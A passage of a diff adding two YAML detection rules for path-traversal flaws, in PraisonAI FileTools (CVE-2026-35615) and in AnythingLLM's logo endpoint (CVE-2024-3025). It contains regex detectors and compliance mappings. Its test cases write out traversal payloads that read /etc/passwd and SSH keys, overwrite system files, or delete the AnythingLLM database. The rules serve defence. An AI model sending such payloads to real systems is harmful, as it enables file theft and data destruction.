FIRST, collapsing '..' sequences, then checks `if '..' in normalized` — a check
|
|
9
|
+
that can never fire, so traversal succeeds. An attacker supplies a path such as
|
|
10
|
+
/tmp/../etc/passwd to read_file / write_file / delete_file and reaches any file
|
|
11
|
+
on the host. This rule keys on the distinctive normpath-then-dotdot-check sink,
|
|
12
|
+
the FileTools operation names with a traversal payload, and the canonical
|
|
13
|
+
/tmp/../etc/passwd PoC.
|
|
14
|
+
author: "ATR Community"
|
|
15
|
+
date: "2026/06/29"
|
|
16
|
+
schema_version: "0.1"
|
|
17
|
+
detection_tier: pattern
|
|
18
|
+
maturity: test
|
|
19
|
+
severity: critical
|
|
20
|
+
references:
|
|
21
|
+
owasp_llm: ["LLM06:2025 - Excessive Agency"]
|
|
22
|
+
owasp_agentic: ["ASI06:2026 - Tool Misuse"]
|
|
23
|
+
mitre_atlas: ["AML.T0049 - Exploit Public-Facing Application"]
|
|
24
|
+
mitre_attack: ["T1190 - Exploit Public-Facing Application"]
|
|
25
|
+
cve: ["CVE-2026-35615"]
|
|
26
|
+
metadata_provenance: { mitre_atlas: human-reviewed, owasp_llm: human-reviewed, owasp_agentic: human-reviewed }
|
|
27
|
+
compliance:
|
|
28
|
+
eu_ai_act:
|
|
29
|
+
- article: "15"
|
|
30
|
+
context: "Article 15 (accuracy, robustness, cybersecurity) — runtime detection of this technique is a cybersecurity control for high-risk AI systems. Technique: PraisonAI FileTools _validate_path normpath Path Traversal (CVE-2026-35615 / GHSA-693f-pf34-72c5)."
|
|
31
|
+
strength: primary
|
|
32
|
+
- article: "9"
|
|
33
|
+
context: "Article 9 (risk management system) requires identified risks to be addressed by appropriate measures; this rule is a runtime risk-treatment control. Technique: PraisonAI FileTools _validate_path normpath Path Traversal (CVE-2026-35615 / GHSA-693f-pf34-72c5)."
|
|
34
|
+
strength: secondary
|
|
35
|
+
nist_ai_rmf:
|
|
36
|
+
- subcategory: "MP.5.1"
|
|
37
|
+
context: "NIST AI RMF MAP 5.1 — likelihood and impact of the identified attack are characterised; this rule detects the adversarial input at runtime. Technique: PraisonAI FileTools _validate_path normpath Path Traversal (CVE-2026-35615 / GHSA-693f-pf34-72c5)."
|
|
38
|
+
strength: primary
|
|
39
|
+
- subcategory: "MG.3.2"
|
|
40
|
+
context: "NIST AI RMF MANAGE 3.2 — runtime monitoring/maintenance control that surfaces this attack class. Technique: PraisonAI FileTools _validate_path normpath Path Traversal (CVE-2026-35615 / GHSA-693f-pf34-72c5)."
|
|
41
|
+
strength: secondary
|
|
42
|
+
iso_42001:
|
|
43
|
+
- clause: "8.1"
|
|
44
|
+
context: "ISO/IEC 42001 Clause 8.1 (operational planning and control) — detection of this payload is an operational control. Technique: PraisonAI FileTools _validate_path normpath Path Traversal (CVE-2026-35615 / GHSA-693f-pf34-72c5)."
|
|
45
|
+
strength: primary
|
|
46
|
+
- clause: "8.3"
|
|
47
|
+
context: "ISO/IEC 42001 Clause 8.3 (AI risk treatment) — this rule implements runtime detection as a treatment control. Technique: PraisonAI FileTools _validate_path normpath Path Traversal (CVE-2026-35615 / GHSA-693f-pf34-72c5)."
|
|
48
|
+
strength: secondary
|
|
49
|
+
tags: { category: tool-poisoning, subcategory: path-traversal, scan_target: both, confidence: high, source: cve-disclosure, vendor_sources: praisonai-cve-2026-35615 }
|
|
50
|
+
agent_source: { type: llm_io, framework: [any], provider: [any] }
|
|
51
|
+
detection:
|
|
52
|
+
condition: any
|
|
53
|
+
false_positives:
|
|
54
|
+
- "Legitimate FileTools.read_file('/workspace/data/report.txt') with an absolute path and no '..' traversal segment."
|
|
55
|
+
- "Security advisory or changelog text that names CVE-2026-35615 but contains no traversal payload."
|
|
56
|
+
- "Discussion of os.path.normpath usage in code review without a '../' traversal sink."
|
|
57
|
+
conditions:
|
|
58
|
+
- field: content
|
|
59
|
+
operator: regex
|
|
60
|
+
value: '(?i)(?:FileTools\.)?(?:read_file|write_file|delete_file|copy_file|move_file|get_file_info|list_files|download_file|_validate_path)\s*\(\s*[''"][^''"\n]{0,80}\.\.[\\/]+[^''"\n]{0,120}(?:etc[\\/]passwd|\.\.[\\/]|[\\/]root[\\/]|id_rsa|shadow)'
|
|
61
|
+
description: >
|
|
62
|
+
PraisonAI FileTools operation invoked with a relative path argument that
|
|
63
|
+
contains a '../' traversal segment reaching a sensitive target — the core
|
|
64
|
+
CVE-2026-35615 exploit shape.
|
|
65
|
+
- field: content
|
|
66
|
+
operator: regex
|
|
67
|
+
value: '(?i)(?:os\.path\.)?normpath\s*\([^)\n]{0,80}\)[\s\S]{0,160}(?:if\s+[''"]\.\.[''"]\s+in\b|[''"]\.\.[''"]\s+in\s+normalized)'
|
|
68
|
+
description: >
|
|
69
|
+
The vulnerable validation order: normpath() called first, then an
|
|
70
|
+
ineffective `'..' in normalized` check — the CVE-2026-35615 logic bug.
|
|
71
|
+
- field: content
|
|
72
|
+
operator: regex
|
|
73
|
+
value: '(?i)[''"/]?(?:tmp[\\/])?\.\.[\\/]+etc[\\/]+passwd'
|
|
74
|
+
description: >
|
|
75
|
+
Canonical /tmp/../etc/passwd traversal PoC string from the advisory.
|
|
76
|
+
- field: content
|
|
77
|
+
operator: regex
|
|
78
|
+
value: '(?i)CVE-2026-35615[\s\S]{0,200}(?:_validate_path|normpath|path\s*traversal|FileTools|\.\.[\\/])'
|
|
79
|
+
description: "explicit CVE framing combined with the vulnerable function or traversal token"
|
|
80
|
+
response:
|
|
81
|
+
actions: [alert, block_input]
|
|
82
|
+
message_template: >
|
|
83
|
+
[ATR-2026-01970] CRITICAL: PraisonAI FileTools path traversal (CVE-2026-35615) —
|
|
84
|
+
normpath-then-dotdot-check lets '../' paths escape the workspace and read/write
|
|
85
|
+
any host file (e.g. /etc/passwd). Block this call and upgrade PraisonAI to >= 1.5.113.
|
|
86
|
+
confidence: 80
|
|
87
|
+
wild_fp_rate: 0
|
|
88
|
+
test_cases:
|
|
89
|
+
true_positives:
|
|
90
|
+
- input: "FileTools.read_file('/tmp/../etc/passwd')"
|
|
91
|
+
expected: triggered
|
|
92
|
+
description: "Canonical advisory PoC — FileTools op with traversal to /etc/passwd"
|
|
93
|
+
- input: "result = _validate_path('/tmp/../../../root/.ssh/id_rsa')"
|
|
94
|
+
expected: triggered
|
|
95
|
+
description: "_validate_path called with multi-level traversal to a secret file"
|
|
96
|
+
- input: "normalized = os.path.normpath(filepath)\n if '..' in normalized:\n raise ValueError"
|
|
97
|
+
expected: triggered
|
|
98
|
+
description: "The vulnerable normpath-first then dead '..' check logic bug"
|
|
99
|
+
- input: "CVE-2026-35615 exploit: write_file('foo/../../../etc/passwd', payload) bypasses _validate_path"
|
|
100
|
+
expected: triggered
|
|
101
|
+
description: "Explicit CVE framing with FileTools traversal payload"
|
|
102
|
+
true_negatives:
|
|
103
|
+
- input: "FileTools.read_file('/workspace/output/results.json')"
|
|
104
|
+
expected: not_triggered
|
|
105
|
+
description: "Legitimate absolute path with no traversal segment"
|
|
106
|
+
- input: "Upgrade PraisonAI to >= 1.5.113 to remediate CVE-2026-35615."
|
|
107
|
+
expected: not_triggered
|
|
108
|
+
description: "Mitigation advisory text without any traversal payload"
|
|
109
|
+
- input: "We use os.path.normpath() to canonicalize the upload directory before saving."
|
|
110
|
+
expected: not_triggered
|
|
111
|
+
description: "Benign normpath mention with no dead '..' check and no traversal"
|
|
@@ -0,0 +1,95 @@
|
|
|
1
|
+
title: "AnythingLLM Logo Endpoint Path Traversal File Read/Delete (CVE-2024-3025)"
|
|
2
|
+
id: ATR-2026-01973
|
|
3
|
+
rule_version: 1
|
|
4
|
+
status: draft
|
|
5
|
+
description: >
|
|
6
|
+
Detects CVE-2024-3025 (CWE-23, CVSS CRITICAL): mintplex-labs/anything-llm
|
|
7
|
+
before 1.0.0 fails to validate the user-supplied logo filename on the
|
|
8
|
+
/api/system/upload-logo and /api/system/logo endpoints. An authenticated
|
|
9
|
+
attacker passes path-traversal sequences (../../../) in the logo filename to
|
|
10
|
+
read or delete arbitrary files outside the assets directory, with the SQLite
|
|
11
|
+
database storage/anythingllm.db as a high-value target. The fix added a
|
|
12
|
+
normalizePath() guard. This rule keys on the specific logo endpoint paths
|
|
13
|
+
combined with ../ traversal (raw or %2e%2e%2f-encoded) into storage/anythingllm.db.
|
|
14
|
+
author: "ATR Community"
|
|
15
|
+
date: "2026/06/29"
|
|
16
|
+
schema_version: "0.1"
|
|
17
|
+
detection_tier: pattern
|
|
18
|
+
maturity: test
|
|
19
|
+
severity: critical
|
|
20
|
+
references:
|
|
21
|
+
owasp_llm: ["LLM06:2025 - Excessive Agency"]
|
|
22
|
+
owasp_agentic: ["ASI06:2026 - Tool Misuse"]
|
|
23
|
+
mitre_atlas: ["AML.T0049 - Exploit Public-Facing Application"]
|
|
24
|
+
mitre_attack: ["T1190 - Exploit Public-Facing Application"]
|
|
25
|
+
cve: ["CVE-2024-3025"]
|
|
26
|
+
metadata_provenance: { mitre_atlas: human-reviewed, owasp_llm: human-reviewed, owasp_agentic: human-reviewed }
|
|
27
|
+
compliance:
|
|
28
|
+
eu_ai_act:
|
|
29
|
+
- article: "15"
|
|
30
|
+
context: "Article 15 (accuracy, robustness, cybersecurity) — runtime detection of this technique is a cybersecurity control for high-risk AI systems. Technique: AnythingLLM Logo Endpoint Path Traversal File Read/Delete (CVE-2024-3025)."
|
|
31
|
+
strength: primary
|
|
32
|
+
- article: "9"
|
|
33
|
+
context: "Article 9 (risk management system) requires identified risks to be addressed by appropriate measures; this rule is a runtime risk-treatment control. Technique: AnythingLLM Logo Endpoint Path Traversal File Read/Delete (CVE-2024-3025)."
|
|
34
|
+
strength: secondary
|
|
35
|
+
nist_ai_rmf:
|
|
36
|
+
- subcategory: "MP.5.1"
|
|
37
|
+
context: "NIST AI RMF MAP 5.1 — likelihood and impact of the identified attack are characterised; this rule detects the adversarial input at runtime. Technique: AnythingLLM Logo Endpoint Path Traversal File Read/Delete (CVE-2024-3025)."
|
|
38
|
+
strength: primary
|
|
39
|
+
- subcategory: "MG.3.2"
|
|
40
|
+
context: "NIST AI RMF MANAGE 3.2 — runtime monitoring/maintenance control that surfaces this attack class. Technique: AnythingLLM Logo Endpoint Path Traversal File Read/Delete (CVE-2024-3025)."
|
|
41
|
+
strength: secondary
|
|
42
|
+
iso_42001:
|
|
43
|
+
- clause: "8.1"
|
|
44
|
+
context: "ISO/IEC 42001 Clause 8.1 (operational planning and control) — detection of this payload is an operational control. Technique: AnythingLLM Logo Endpoint Path Traversal File Read/Delete (CVE-2024-3025)."
|
|
45
|
+
strength: primary
|
|
46
|
+
- clause: "8.3"
|
|
47
|
+
context: "ISO/IEC 42001 Clause 8.3 (AI risk treatment) — this rule implements runtime detection as a treatment control. Technique: AnythingLLM Logo Endpoint Path Traversal File Read/Delete (CVE-2024-3025)."
|
|
48
|
+
strength: secondary
|
|
49
|
+
tags: { category: tool-poisoning, subcategory: path-traversal, scan_target: both, confidence: high, source: cve-disclosure, vendor_sources: anythingllm-cve-2024-3025 }
|
|
50
|
+
agent_source: { type: llm_io, framework: [any], provider: [any] }
|
|
51
|
+
detection:
|
|
52
|
+
condition: any
|
|
53
|
+
false_positives:
|
|
54
|
+
- "Legitimate logo upload/fetch hitting /api/system/upload-logo or /api/system/logo with a normal filename like my-logo.png and no ../ sequence."
|
|
55
|
+
- "Documentation or changelog mentioning the logo endpoints without a traversal payload."
|
|
56
|
+
conditions:
|
|
57
|
+
- field: content
|
|
58
|
+
operator: regex
|
|
59
|
+
value: '(?i)/api/system/(?:upload-)?logo[\s\S]{0,200}(?:\.\./|\.\.%2f|%2e%2e%2f|%2e%2e/){2,}[\s\S]{0,120}(?:storage[/\\])?anythingllm\.db'
|
|
60
|
+
description: "AnythingLLM logo endpoint hit with multi-level ../ traversal (raw or URL-encoded) reaching storage/anythingllm.db"
|
|
61
|
+
- field: content
|
|
62
|
+
operator: regex
|
|
63
|
+
value: '(?i)/api/system/(?:upload-)?logo[\s\S]{0,200}(?:filename|logo)=[\s\S]{0,40}(?:\.\./|%2e%2e%2f|\.\.%2f){2,}'
|
|
64
|
+
description: "Logo filename/logo query param carrying multi-level path-traversal sequences on the logo endpoint"
|
|
65
|
+
- field: content
|
|
66
|
+
operator: regex
|
|
67
|
+
value: '(?i)CVE-2024-3025[\s\S]{0,200}(?:path\s*traversal|logo|anythingllm\.db|/api/system/(?:upload-)?logo)'
|
|
68
|
+
description: "explicit CVE framing"
|
|
69
|
+
response:
|
|
70
|
+
actions: [alert, block_input]
|
|
71
|
+
message_template: >
|
|
72
|
+
[ATR-2026-01973] CRITICAL: AnythingLLM logo endpoint path traversal (CVE-2024-3025) reads/deletes arbitrary files such as storage/anythingllm.db. Block and patch.
|
|
73
|
+
confidence: 80
|
|
74
|
+
wild_fp_rate: 0
|
|
75
|
+
test_cases:
|
|
76
|
+
true_positives:
|
|
77
|
+
- input: "GET /api/system/logo?filename=../../../storage/anythingllm.db HTTP/1.1"
|
|
78
|
+
expected: triggered
|
|
79
|
+
description: "Logo fetch endpoint with ../ traversal to the SQLite database file"
|
|
80
|
+
- input: "POST /api/system/upload-logo with logo=../../../../storage/anythingllm.db to delete the database"
|
|
81
|
+
expected: triggered
|
|
82
|
+
description: "Upload-logo endpoint abused with traversal into storage/anythingllm.db"
|
|
83
|
+
- input: "Exploiting CVE-2024-3025: /api/system/logo path traversal to read anythingllm.db"
|
|
84
|
+
expected: triggered
|
|
85
|
+
description: "Explicit CVE-2024-3025 framing with the logo endpoint and traversal target"
|
|
86
|
+
true_negatives:
|
|
87
|
+
- input: "GET /api/system/logo?theme=default HTTP/1.1 returns the configured workspace logo"
|
|
88
|
+
expected: not_triggered
|
|
89
|
+
description: "Normal logo fetch with theme param, no traversal sequence"
|
|
90
|
+
- input: "POST /api/system/upload-logo uploading company-logo.png as the new appearance logo"
|
|
91
|
+
expected: not_triggered
|
|
92
|
+
description: "Legitimate logo upload with a clean filename"
|
|
93
|
+
- input: "The /api/system/logo endpoint serves the branding image configured in Appearance settings."
|
|
94
|
+
expected: not_triggered
|
|
95
|
+
description: "Generic mention of the endpoint with no exploit token or traversal"
|